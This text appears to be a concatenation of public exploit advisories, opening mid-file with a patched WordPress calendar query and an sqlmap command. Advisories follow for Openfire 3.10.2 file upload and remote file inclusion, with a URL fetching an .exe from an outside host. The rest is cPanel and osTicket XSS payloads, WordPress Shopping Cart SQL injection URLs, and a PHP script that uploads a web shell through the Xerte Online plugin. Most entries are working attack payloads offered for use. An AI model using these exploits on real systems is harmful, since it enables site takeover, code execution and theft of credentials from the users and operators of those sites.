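// Hypothetical definition site for CP_CALENDAR_ID (the advisory does not show
// where the plugin defines it, only that it comes from the unvalidated dex_item
// POST parameter). Reject anything but a positive integer before defining it.
$dex_item = isset( $_POST['dex_item'] ) ? filter_var( $_POST['dex_item'], FILTER_VALIDATE_INT ) : false;
if ( $dex_item === false || $dex_item <= 0 )
    wp_die( 'Invalid calendar id' );
define( 'CP_CALENDAR_ID', $dex_item );

// The query from dex_reservations_get_option(), with the id bound as %d;
// prepare() casts %d arguments to int, so no string can reach the WHERE clause.
$myrows = $wpdb->get_results( $wpdb->prepare(
    "SELECT * FROM " . DEX_RESERVATIONS_CONFIG_TABLE_NAME . " WHERE id = %d",
    CP_CALENDAR_ID
) );
```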
---------------------------------------------------------------------------- 
PoC using the sqlmap tool:

python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_check_posted_data" --data="dex_reservations_post=1&dex_item=1" \
  -p dex_item --dbms="MySQL" --level=5 --risk=3


 #############
 Timeline

 2015-03-01: vulnerability found
 2015-03-09: reported to vendor
 2015-03-21: cp_reservation_calendar v1.1.7 released
 2015-09-15: full disclosure
            
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-FILE-UPLOAD.txt



Vendor:
=========================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp



Product:
================================
Openfire 3.10.2

Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).



Vulnerability Type:
===================
Unrestricted File Upload



CVE Reference:
==============
N/A




Vulnerability Details:
=====================

The application states that plugin files (.jar) can be uploaded directly
through the form, but files with the following extensions are accepted as well:

.exe
.php
.jsp
.py
.sh



Exploit code(s):
===============

1) Choose a file of one of the non-.jar types listed above using the file browser
2) Click 'upload plugin'

http://localhost:9090/plugin-admin.jsp

The uploaded files are stored under the /openfire/plugins directory.



Disclosure Timeline:
=========================================================

Vendor Notification:  NA
Sept 14, 2015 : Public Disclosure



Exploitation Technique:
=======================
Local



Severity Level:
=========================================================
Medium



Description:
==========================================================


Request Method(s):              [+] POST


Vulnerable Product:             [+] Openfire 3.10.2


Vulnerable Parameter(s):        [+] fileName


Affected Area(s):               [+] Server


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
            
source: https://www.securityfocus.com/bid/57064/info

cPanel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/frontend/x3/files/dir.html?showhidden=1&dir=%3Cimg%20src=x%20onerror=prompt%280%29;%3E 
            
source: https://www.securityfocus.com/bid/57098/info

The Xerte Online plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Xerte Online 0.32 is vulnerable; other versions may also be affected.

##################################################
# Description : Wordpress Plugins - Xerte Online Arbitrary File Upload Vulnerability
# Version : 0.32
# Link : http://wordpress.org/extend/plugins/xerte-online/
# Plugins : http://downloads.wordpress.org/plugin/xerte-online.0.32.zip
# Date : 30-12-2012
# Google Dork : inurl:/wp-content/plugins/xerte-online/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################

Exploit :

PostShell.php
<?php

$code = "[CODE PHP]";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/xerte-online/xertefiles/save.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('filename'=>"/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php",
                'filedata'=>"$code"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>


Shell Access :
http://www.example.com/wordpress/wp-content/plugins/xerte-online/xertefiles/lo-xerte.php 
            
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-RFI.txt



Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp



Product:
================================
Openfire 3.10.2

Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).


Vulnerability Type:
=================================
Remote File Inclusion



CVE Reference:
==============
N/A





Vulnerability Details:
=====================

In "available-plugins.jsp" there is no validation for plugin downloads,
allowing arbitrary files to be downloaded from anywhere on the internet.

On line 40, all that needs to be satisfied is that the parameter is not null:

boolean downloadRequested = request.getParameter("download") != null;
String url = request.getParameter("url");


If the above check returns true, the application downloads whatever URL it is given.

line 54:

    if (downloadRequested) {
        // Download and install new plugin
        updateManager.downloadPlugin(url);
        // Log the event
        webManager.logEvent("downloaded new plugin from "+url, null);
    }




Exploit code(s):
================

1) Download an arbitrary file

e.g.

http://localhost:9090/available-plugins.jsp?download=1&url=http://ghostofsin.abyss/abysmalgod.exe

The fetched file is written to the "openfire\plugins" directory.




Disclosure Timeline:
=========================================================
Vendor Notification:  NA
Sept 14, 2015  : Public Disclosure




Exploitation Technique:
=======================
Remote



Severity Level:
=========================================================
High



Description:
==========================================================


Request Method(s):              [+]  GET


Vulnerable Product:             [+]  Openfire 3.10.2


Vulnerable Parameter(s):        [+]  download, url


Affected Area(s):               [+]  Server


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
            
source: https://www.securityfocus.com/bid/57101/info

The WordPress Shopping Cart plugin for WordPress is prone to multiple SQL-injection vulnerabilities and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data.

Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.

WordPress Shopping Cart 8.1.14 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php?reqID=1' or 1='1 
            
source: https://www.securityfocus.com/bid/57101/info
 
The WordPress Shopping Cart plugin for WordPress is prone to multiple SQL-injection vulnerabilities and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data.
 
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
WordPress Shopping Cart 8.1.14 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php?reqID=1' or 1='1 
            
source: https://www.securityfocus.com/bid/57111/info
 
osTicket is prone to multiple input-validation vulnerabilities including:
 
1. Multiple cross-site scripting vulnerabilities
2. An open-redirection vulnerability
3. Multiple SQL-injection vulnerabilities
 
An attacker may leverage these issues to perform spoofing and phishing attacks, to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database and execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
 
osTicket 1.7 DPR3 is vulnerable; other versions may also be affected.

http://www.example.com/learn/ostickRC/scp/tickets.php?a=export&h=9c2601b88c05055b51962b140f5121389&status=%22%20onmouseover=%22alert%281%29%22